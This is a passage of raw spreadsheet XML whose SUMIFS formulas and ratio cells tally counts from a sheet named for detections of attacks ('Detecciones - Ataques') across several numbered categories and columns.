        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X13)</f>
        <v>1</v>
      </c>
      <c r="Z13" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X13)</f>
        <v>6</v>
      </c>
      <c r="AA13" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X13)</f>
        <v>12</v>
      </c>
      <c r="AB13" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X13)</f>
        <v>24</v>
      </c>
      <c r="AC13" s="235">
        <f t="shared" si="2"/>
        <v>24</v>
      </c>
      <c r="AD13" s="234"/>
      <c r="AF13" s="234"/>
      <c r="AJ13" s="233" t="s">
        <v>262</v>
      </c>
      <c r="AK13" s="241">
        <f t="shared" ref="AK13:AN13" si="5">Y13/$V13</f>
        <v>0.2</v>
      </c>
      <c r="AL13" s="241">
        <f t="shared" si="5"/>
        <v>1.2</v>
      </c>
      <c r="AM13" s="241">
        <f t="shared" si="5"/>
        <v>2.4</v>
      </c>
      <c r="AN13" s="242">
        <f t="shared" si="5"/>
        <v>4.8</v>
      </c>
      <c r="AO13" s="234"/>
      <c r="AP13" s="234"/>
      <c r="AQ13" s="234"/>
      <c r="AR13" s="234"/>
      <c r="AS13" s="234"/>
    </row>
    <row r="14">
      <c r="C14" s="232"/>
      <c r="D14" s="232"/>
      <c r="E14" s="232"/>
      <c r="F14" s="232"/>
      <c r="G14" s="232"/>
      <c r="H14" s="232"/>
      <c r="I14" s="232"/>
      <c r="J14" s="233" t="s">
        <v>450</v>
      </c>
      <c r="K14" s="234">
        <v>0.0</v>
      </c>
      <c r="L14" s="234">
        <v>0.0</v>
      </c>
      <c r="M14" s="234">
        <v>2.0</v>
      </c>
      <c r="N14" s="234">
        <v>3.0</v>
      </c>
      <c r="O14" s="235">
        <v>3.0</v>
      </c>
      <c r="Q14" s="233" t="s">
        <v>450</v>
      </c>
      <c r="R14" s="234">
        <v>0.0</v>
      </c>
      <c r="S14" s="234">
        <v>0.0</v>
      </c>
      <c r="T14" s="234">
        <v>2.0</v>
      </c>
      <c r="U14" s="234">
        <v>3.0</v>
      </c>
      <c r="V14" s="235">
        <f>'(D) - Resultados I'!AC41</f>
        <v>7</v>
      </c>
      <c r="X14" s="233" t="s">
        <v>450</v>
      </c>
      <c r="Y14" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X14)</f>
        <v>1</v>
      </c>
      <c r="Z14" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X14)</f>
        <v>7</v>
      </c>
      <c r="AA14" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X14)</f>
        <v>15</v>
      </c>
      <c r="AB14" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X14)</f>
        <v>50</v>
      </c>
      <c r="AC14" s="235">
        <f t="shared" si="2"/>
        <v>50</v>
      </c>
      <c r="AD14" s="234"/>
      <c r="AF14" s="234"/>
      <c r="AJ14" s="233" t="s">
        <v>450</v>
      </c>
      <c r="AK14" s="241">
        <f t="shared" ref="AK14:AN14" si="6">Y14/$V14</f>
        <v>0.1428571429</v>
      </c>
      <c r="AL14" s="241">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="AM14" s="241">
        <f t="shared" si="6"/>
        <v>2.142857143</v>
      </c>
      <c r="AN14" s="242">
        <f t="shared" si="6"/>
        <v>7.142857143</v>
      </c>
      <c r="AO14" s="234"/>
      <c r="AP14" s="234"/>
      <c r="AQ14" s="234"/>
      <c r="AR14" s="234"/>
      <c r="AS14" s="234"/>
    </row>
    <row r="15">
      <c r="C15" s="232"/>
      <c r="D15" s="232"/>
      <c r="E15" s="232"/>
      <c r="F15" s="232"/>
      <c r="G15" s="232"/>
      <c r="H15" s="232"/>
      <c r="I15" s="232"/>
      <c r="J15" s="233" t="s">
        <v>534</v>
      </c>
      <c r="K15" s="234">
        <v>1.0</v>
      </c>
      <c r="L15" s="234">
        <v>1.0</v>
      </c>
      <c r="M15" s="234">
        <v>1.0</v>
      </c>
      <c r="N15" s="234">
        <v>2.0</v>
      </c>
      <c r="O15" s="235">
        <v>2.0</v>
      </c>
      <c r="Q15" s="233" t="s">
        <v>534</v>
      </c>
      <c r="R15" s="234">
        <v>1.0</v>
      </c>
      <c r="S15" s="234">
        <v>1.0</v>
      </c>
      <c r="T15" s="234">
        <v>1.0</v>
      </c>
      <c r="U15" s="234">
        <v>2.0</v>
      </c>
      <c r="V15" s="235">
        <f>'(D) - Resultados I'!AC42</f>
        <v>6</v>
      </c>
      <c r="X15" s="233" t="s">
        <v>534</v>
      </c>
      <c r="Y15" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X15)</f>
        <v>2</v>
      </c>
      <c r="Z15" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X15)</f>
        <v>3</v>
      </c>
      <c r="AA15" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X15)</f>
        <v>3</v>
      </c>
      <c r="AB15" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X15)</f>
        <v>6</v>
      </c>
      <c r="AC15" s="235">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="AD15" s="234"/>
      <c r="AF15" s="234"/>
      <c r="AJ15" s="233" t="s">
        <v>534</v>
      </c>
      <c r="AK15" s="241">
        <f t="shared" ref="AK15:AN15" si="7">Y15/$V15</f>
        <v>0.3333333333</v>
      </c>
      <c r="AL15" s="241">
        <f t="shared" si="7"/>
        <v>0.5</v>
      </c>
      <c r="AM15" s="241">
        <f t="shared" si="7"/>
        <v>0.5</v>
      </c>
      <c r="AN15" s="242">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="AO15" s="234"/>
      <c r="AP15" s="234"/>
      <c r="AQ15" s="234"/>
      <c r="AR15" s="234"/>
      <c r="AS15" s="234"/>
    </row>
    <row r="16">
      <c r="C16" s="232"/>
      <c r="D16" s="232"/>
      <c r="E16" s="232"/>
      <c r="F16" s="232"/>
      <c r="G16" s="232"/>
      <c r="H16" s="232"/>
      <c r="I16" s="232"/>
      <c r="J16" s="233" t="s">
        <v>658</v>
      </c>
      <c r="K16" s="234">
        <v>0.0</v>
      </c>
      <c r="L16" s="234">
        <v>2.0</v>
      </c>
      <c r="M16" s="234">
        <v>2.0</v>
      </c>
      <c r="N16" s="234">
        <v>3.0</v>
      </c>
      <c r="O16" s="235">
        <v>3.0</v>
      </c>
      <c r="Q16" s="233" t="s">
        <v>658</v>
      </c>
      <c r="R16" s="234">
        <v>0.0</v>
      </c>
      <c r="S16" s="234">
        <v>2.0</v>
      </c>
      <c r="T16" s="234">
        <v>3.0</v>
      </c>
      <c r="U16" s="234">
        <v>4.0</v>
      </c>
      <c r="V16" s="235">
        <f>'(D) - Resultados I'!AC43</f>
        <v>17</v>
      </c>
      <c r="X16" s="233" t="s">
        <v>658</v>
      </c>
      <c r="Y16" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X16)</f>
        <v>2</v>
      </c>
      <c r="Z16" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X16)</f>
        <v>7</v>
      </c>
      <c r="AA16" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X16)</f>
        <v>10</v>
      </c>
      <c r="AB16" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X16)</f>
        <v>62</v>
      </c>
      <c r="AC16" s="235">
        <f t="shared" si="2"/>
        <v>62</v>
      </c>
      <c r="AD16" s="234"/>
      <c r="AF16" s="234"/>
      <c r="AJ16" s="233" t="s">
        <v>658</v>
      </c>
      <c r="AK16" s="241">
        <f t="shared" ref="AK16:AN16" si="8">Y16/$V16</f>
        <v>0.1176470588</v>
      </c>
      <c r="AL16" s="241">
        <f t="shared" si="8"/>
        <v>0.4117647059</v>
      </c>
      <c r="AM16" s="241">
        <f t="shared" si="8"/>
        <v>0.5882352941</v>
      </c>
      <c r="AN16" s="242">
        <f t="shared" si="8"/>
        <v>3.647058824</v>
      </c>
      <c r="AO16" s="234"/>
      <c r="AP16" s="234"/>
      <c r="AQ16" s="234"/>
      <c r="AR16" s="234"/>
      <c r="AS16" s="234"/>
    </row>
    <row r="17">
      <c r="C17" s="232"/>
      <c r="D17" s="232"/>
      <c r="E17" s="232"/>
      <c r="F17" s="232"/>
      <c r="G17" s="232"/>
      <c r="H17" s="232"/>
      <c r="I17" s="232"/>
      <c r="J17" s="233" t="s">
        <v>351</v>
      </c>
      <c r="K17" s="234">
        <v>0.0</v>
      </c>
      <c r="L17" s="234">
        <v>1.0</v>
      </c>
      <c r="M17" s="234">
        <v>1.0</v>
      </c>
      <c r="N17" s="234">
        <v>2.0</v>
      </c>
      <c r="O17" s="235">
        <v>7.0</v>
      </c>
      <c r="Q17" s="233" t="s">
        <v>351</v>
      </c>
      <c r="R17" s="234">
        <v>0.0</v>
      </c>
      <c r="S17" s="234">
        <v>1.0</v>
      </c>
      <c r="T17" s="234">
        <v>1.0</v>
      </c>
      <c r="U17" s="234">
        <v>2.0</v>
      </c>
      <c r="V17" s="235">
        <f>'(D) - Resultados I'!AC44</f>
        <v>7</v>
      </c>
      <c r="X17" s="233" t="s">
        <v>351</v>
      </c>
      <c r="Y17" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X17)</f>
        <v>0</v>
      </c>
      <c r="Z17" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X17)</f>
        <v>3</v>
      </c>
      <c r="AA17" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X17)</f>
        <v>4</v>
      </c>
      <c r="AB17" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X17)</f>
        <v>22</v>
      </c>
      <c r="AC17" s="235">
        <f t="shared" si="2"/>
        <v>22</v>
      </c>
      <c r="AD17" s="234"/>
      <c r="AF17" s="234"/>
      <c r="AJ17" s="233" t="s">
        <v>351</v>
      </c>
      <c r="AK17" s="241">
        <f t="shared" ref="AK17:AN17" si="9">Y17/$V17</f>
        <v>0</v>
      </c>
      <c r="AL17" s="241">
        <f t="shared" si="9"/>
        <v>0.4285714286</v>
      </c>
      <c r="AM17" s="241">
        <f t="shared" si="9"/>
        <v>0.5714285714</v>
      </c>
      <c r="AN17" s="242">
        <f t="shared" si="9"/>
        <v>3.142857143</v>
      </c>
      <c r="AO17" s="234"/>
      <c r="AP17" s="234"/>
      <c r="AQ17" s="234"/>
      <c r="AR17" s="234"/>
      <c r="AS17" s="234"/>
    </row>
    <row r="18">
      <c r="C18" s="232"/>
      <c r="D18" s="232"/>
      <c r="E18" s="232"/>
      <c r="F18" s="232"/>
      <c r="G18" s="232"/>
      <c r="H18" s="232"/>
      <c r="I18" s="232"/>
      <c r="J18" s="233" t="s">
        <v>397</v>
      </c>
      <c r="K18" s="234">
        <v>0.0</v>
      </c>
      <c r="L18" s="234">
        <v>0.0</v>
      </c>
      <c r="M18" s="234">
        <v>1.0</v>
      </c>
      <c r="N18" s="234">
        <v>1.0</v>
      </c>
      <c r="O18" s="235">
        <v>5.0</v>
      </c>
      <c r="Q18" s="233" t="s">
        <v>397</v>
      </c>
      <c r="R18" s="234">
        <v>0.0</v>
      </c>
      <c r="S18" s="234">
        <v>0.0</v>
      </c>
      <c r="T18" s="234">
        <v>1.0</v>
      </c>
      <c r="U18" s="234">
        <v>1.0</v>
      </c>
      <c r="V18" s="235">
        <f>'(D) - Resultados I'!AC45</f>
        <v>6</v>
      </c>
      <c r="X18" s="233" t="s">
        <v>397</v>
      </c>
      <c r="Y18" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X18)</f>
        <v>1</v>
      </c>
      <c r="Z18" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X18)</f>
        <v>1</v>
      </c>
      <c r="AA18" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X18)</f>
        <v>4</v>
      </c>
      <c r="AB18" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X18)</f>
        <v>20</v>
      </c>
      <c r="AC18" s="235">
        <f t="shared" si="2"/>
        <v>20</v>
      </c>
      <c r="AD18" s="234"/>
      <c r="AF18" s="234"/>
      <c r="AJ18" s="233" t="s">
        <v>397</v>
      </c>
      <c r="AK18" s="241">
        <f t="shared" ref="AK18:AN18" si="10">Y18/$V18</f>
        <v>0.1666666667</v>
      </c>
      <c r="AL18" s="241">
        <f t="shared" si="10"/>
        <v>0.1666666667</v>
      </c>
      <c r="AM18" s="241">
        <f t="shared" si="10"/>
        <v>0.6666666667</v>
      </c>
      <c r="AN18" s="242">
        <f t="shared" si="10"/>
        <v>3.333333333</v>
      </c>
      <c r="AO18" s="234"/>
      <c r="AP18" s="234"/>
      <c r="AQ18" s="234"/>
      <c r="AR18" s="234"/>
      <c r="AS18" s="234"/>
    </row>
    <row r="19">
      <c r="C19" s="232"/>
      <c r="D19" s="232"/>
      <c r="E19" s="232"/>
      <c r="F19" s="232"/>
      <c r="G19" s="232"/>
      <c r="H19" s="232"/>
      <c r="I19" s="232"/>
      <c r="J19" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="K19" s="234">
        <v>2.0</v>
      </c>
      <c r="L19" s="234">
        <v>2.0</v>
      </c>
      <c r="M19" s="234">
        <v>2.0</v>
      </c>
      <c r="N19" s="234">
        <v>2.0</v>
      </c>
      <c r="O19" s="235">
        <v>3.0</v>
      </c>
      <c r="Q19" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="R19" s="234">
        <v>2.0</v>
      </c>
      <c r="S19" s="234">
        <v>2.0</v>
      </c>
      <c r="T19" s="234">
        <v>3.0</v>
      </c>
      <c r="U19" s="234">
        <v>3.0</v>
      </c>
      <c r="V19" s="235">
        <f>'(D) - Resultados I'!AC46</f>
        <v>4</v>
      </c>
      <c r="X19" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="Y19" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X19)</f>
        <v>2</v>
      </c>
      <c r="Z19" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X19)</f>
        <v>6</v>
      </c>
      <c r="AA19" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X19)</f>
        <v>14</v>
      </c>
      <c r="AB19" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X19)</f>
        <v>28</v>
      </c>
      <c r="AC19" s="235">
        <f t="shared" si="2"/>
        <v>28</v>
      </c>
      <c r="AD19" s="234"/>
      <c r="AF19" s="234"/>
      <c r="AJ19" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="AK19" s="241">
        <f t="shared" ref="AK19:AN19" si="11">Y19/$V19</f>
        <v>0.5</v>
      </c>
      <c r="AL19" s="241">
        <f t="shared" si="11"/>
        <v>1.5</v>
      </c>
      <c r="AM19" s="241">
        <f t="shared" si="11"/>
        <v>3.5</v>
      </c>
      <c r="AN19" s="242">
        <f t="shared" si="11"/>
        <v>7</v>
      </c>
      <c r="AO19" s="234"/>
      <c r="AP19" s="234"/>
      <c r="AQ19" s="234"/>
      <c r="AR19" s="234"/>
      <c r="AS19" s="234"/>
    </row>
    <row r="20">
      <c r="C20" s="232"/>
      <c r="D20" s="232"/>
      <c r="E20" s="232"/>
      <c r="F20" s="232"/>
      <c r="G20" s="232"/>
      <c r="H20" s="232"/>
      <c r="I20" s="232"/>
      <c r="J20" s="233" t="s">
        <v>505</v>
      </c>
      <c r="K20" s="234">
        <v>1.0</v>
      </c>
      <c r="L20" s="234">
        <v>2.0</v>
      </c>
      <c r="M20" s="234">
        <v>2.0</v>
      </c>
      <c r="N20" s="234">
        <v>2.0</v>
      </c>
      <c r="O20" s="235">
        <v>4.0</v>
      </c>
      <c r="Q20" s="233" t="s">
        <v>505</v>
      </c>
      <c r="R20" s="234">
        <v>1.0</v>
      </c>
      <c r="S20" s="234">
        <v>3.0</v>
      </c>
      <c r="T20" s="234">
        <v>3.0</v>
      </c>
      <c r="U20" s="234">
        <v>3.0</v>
      </c>
      <c r="V20" s="235">
        <f>'(D) - Resultados I'!AC47</f>
        <v>6</v>
      </c>
      <c r="X20" s="233" t="s">
        <v>505</v>
      </c>
      <c r="Y20" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X20)</f>
        <v>9</v>
      </c>
      <c r="Z20" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X20)</f>
        <v>139</v>
      </c>
      <c r="AA20" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X20)</f>
        <v>146</v>
      </c>
      <c r="AB20" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X20)</f>
        <v>383</v>
      </c>
      <c r="AC20" s="235">
        <f t="shared" si="2"/>
        <v>383</v>
      </c>
      <c r="AD20" s="234"/>
      <c r="AF20" s="234"/>
      <c r="AJ20" s="233" t="s">
        <v>505</v>
      </c>
      <c r="AK20" s="241">
        <f t="shared" ref="AK20:AN20" si="12">Y20/$V20</f>
        <v>1.5</v>
      </c>
      <c r="AL20" s="241">
        <f t="shared" si="12"/>
        <v>23.16666667</v>
      </c>
      <c r="AM20" s="241">
        <f t="shared" si="12"/>
        <v>24.33333333</v>
      </c>
      <c r="AN20" s="242">
        <f t="shared" si="12"/>
        <v>63.83333333</v>
      </c>
      <c r="AO20" s="234"/>
      <c r="AP20" s="234"/>
      <c r="AQ20" s="234"/>
      <c r="AR20" s="234"/>
      <c r="AS20" s="234"/>
    </row>
    <row r="21">
      <c r="C21" s="232"/>
      <c r="D21" s="232"/>
      <c r="E21" s="232"/>
      <c r="F21" s="232"/>
      <c r="G21" s="232"/>
      <c r="H21" s="232"/>
      <c r="I21" s="232"/>
      <c r="J21" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="K21" s="234">
        <v>1.0</v>
      </c>
      <c r="L21" s="234">
        <v>1.0</v>
      </c>
      <c r="M21" s="234">
        <v>1.0</v>
      </c>
      <c r="N21" s="234">
        <v>1.0</v>
      </c>
      <c r="O21" s="235">
        <v>2.0</v>
      </c>
      <c r="Q21" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="R21" s="234">
        <v>1.0</v>
      </c>
      <c r="S21" s="234">
        <v>1.0</v>
      </c>
      <c r="T21" s="234">
        <v>1.0</v>
      </c>
      <c r="U21" s="234">
        <v>2.0</v>
      </c>
      <c r="V21" s="235">
        <f>'(D) - Resultados I'!AC48</f>
        <v>2</v>
      </c>
      <c r="X21" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="Y21" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X21)</f>
        <v>3</v>
      </c>
      <c r="Z21" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X21)</f>
        <v>3</v>
      </c>
      <c r="AA21" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X21)</f>
        <v>4</v>
      </c>
      <c r="AB21" s="234">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X21)</f>
        <v>10</v>
      </c>
      <c r="AC21" s="235">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="AD21" s="234"/>
      <c r="AF21" s="234"/>
      <c r="AJ21" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="AK21" s="241">
        <f t="shared" ref="AK21:AN21" si="13">Y21/$V21</f>
        <v>1.5</v>
      </c>
      <c r="AL21" s="241">
        <f t="shared" si="13"/>
        <v>1.5</v>
      </c>
      <c r="AM21" s="241">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="AN21" s="242">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="AO21" s="234"/>
      <c r="AP21" s="234"/>
      <c r="AQ21" s="234"/>
      <c r="AR21" s="234"/>
      <c r="AS21" s="234"/>
    </row>
    <row r="22">
      <c r="C22" s="232"/>
      <c r="D22" s="232"/>
      <c r="E22" s="232"/>
      <c r="F22" s="232"/>
      <c r="G22" s="232"/>
      <c r="H22" s="232"/>
      <c r="I22" s="232"/>
      <c r="J22" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="K22" s="244">
        <v>1.0</v>
      </c>
      <c r="L22" s="244">
        <v>2.0</v>
      </c>
      <c r="M22" s="244">
        <v>2.0</v>
      </c>
      <c r="N22" s="244">
        <v>2.0</v>
      </c>
      <c r="O22" s="245">
        <v>2.0</v>
      </c>
      <c r="Q22" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="R22" s="244">
        <v>1.0</v>
      </c>
      <c r="S22" s="244">
        <v>2.0</v>
      </c>
      <c r="T22" s="244">
        <v>2.0</v>
      </c>
      <c r="U22" s="244">
        <v>2.0</v>
      </c>
      <c r="V22" s="245">
        <f>'(D) - Resultados I'!AC49</f>
        <v>2</v>
      </c>
      <c r="X22" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="Y22" s="244">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AE$3:AE$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X22)</f>
        <v>2</v>
      </c>
      <c r="Z22" s="244">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BB$3:BB$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X22)</f>
        <v>6</v>
      </c>
      <c r="AA22" s="244">
        <f>SUMIFS('(B) - Detecciones - Ataques'!BY$3:BY$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X22)</f>
        <v>10</v>
      </c>
      <c r="AB22" s="244">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CV$3:CV$133,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$133,$X22)</f>
        <v>20</v>
      </c>
      <c r="AC22" s="245">
        <f t="shared" si="2"/>
        <v>20</v>
      </c>
      <c r="AD22" s="234"/>
      <c r="AF22" s="234"/>
      <c r="AJ22" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="AK22" s="246">
        <f t="shared" ref="AK22:AN22" si="14">Y22/$V22</f>
        <v>1</v>
      </c>
      <c r="AL22" s="246">
        <f t="shared" si="14"/>
        <v>3</v>
      </c>
      <c r="AM22" s="246">
        <f t="shared" si="14"/>
        <v>5</v>
      </c>
      <c r="AN22" s="247">
        <f t="shared" si="14"/>
        <v>10</v>
      </c>
      <c r="AO22" s="234"/>
      <c r="AP22" s="234"/>
      <c r="AQ22" s="234"/>
      <c r="AR22" s="234"/>
      <c r="AS22" s="234"/>
    </row>
    <row r="23">
      <c r="C23" s="248"/>
      <c r="D23" s="248"/>
      <c r="E23" s="248"/>
      <c r="F23" s="248"/>
      <c r="G23" s="248"/>
      <c r="H23" s="248"/>
      <c r="I23" s="248"/>
      <c r="J23" s="248"/>
      <c r="K23" s="248"/>
      <c r="L23" s="248"/>
      <c r="M23" s="248"/>
      <c r="N23" s="248"/>
      <c r="O23" s="248"/>
    </row>
    <row r="24">
      <c r="C24" s="248"/>
      <c r="D24" s="248"/>
      <c r="E24" s="248"/>
      <c r="F24" s="248"/>
      <c r="G24" s="248"/>
      <c r="H24" s="248"/>
      <c r="I24" s="248"/>
      <c r="J24" s="248"/>
      <c r="K24" s="248"/>
      <c r="L24" s="248"/>
      <c r="M24" s="248"/>
      <c r="N24" s="248"/>
      <c r="O24" s="249" t="s">
        <v>1456</v>
      </c>
      <c r="Q24" s="248"/>
      <c r="R24" s="248"/>
      <c r="S24" s="248"/>
      <c r="T24" s="248"/>
      <c r="U24" s="248"/>
      <c r="V24" s="249" t="s">
        <v>1456</v>
      </c>
      <c r="AC24" s="249" t="s">
        <v>1456</v>
      </c>
    </row>
    <row r="25">
      <c r="C25" s="250"/>
      <c r="D25" s="250"/>
      <c r="E25" s="250"/>
      <c r="F25" s="250"/>
      <c r="G25" s="250"/>
      <c r="H25" s="250"/>
      <c r="I25" s="250"/>
      <c r="J25" s="250" t="s">
        <v>1470</v>
      </c>
      <c r="K25" s="251">
        <f t="shared" ref="K25:O25" si="15">SUM(K10:K22)</f>
        <v>9</v>
      </c>
      <c r="L25" s="251">
        <f t="shared" si="15"/>
        <v>16</v>
      </c>
      <c r="M25" s="251">
        <f t="shared" si="15"/>
        <v>21</v>
      </c>
      <c r="N25" s="251">
        <f t="shared" si="15"/>
        <v>26</v>
      </c>
      <c r="O25" s="234">
        <f t="shared" si="15"/>
        <v>44</v>
      </c>
      <c r="Q25" s="250" t="s">
        <v>1471</v>
      </c>
      <c r="R25" s="225">
        <f t="shared" ref="R25:V25" si="16">SUM(R10:R22)</f>
        <v>9</v>
      </c>
      <c r="S25" s="225">
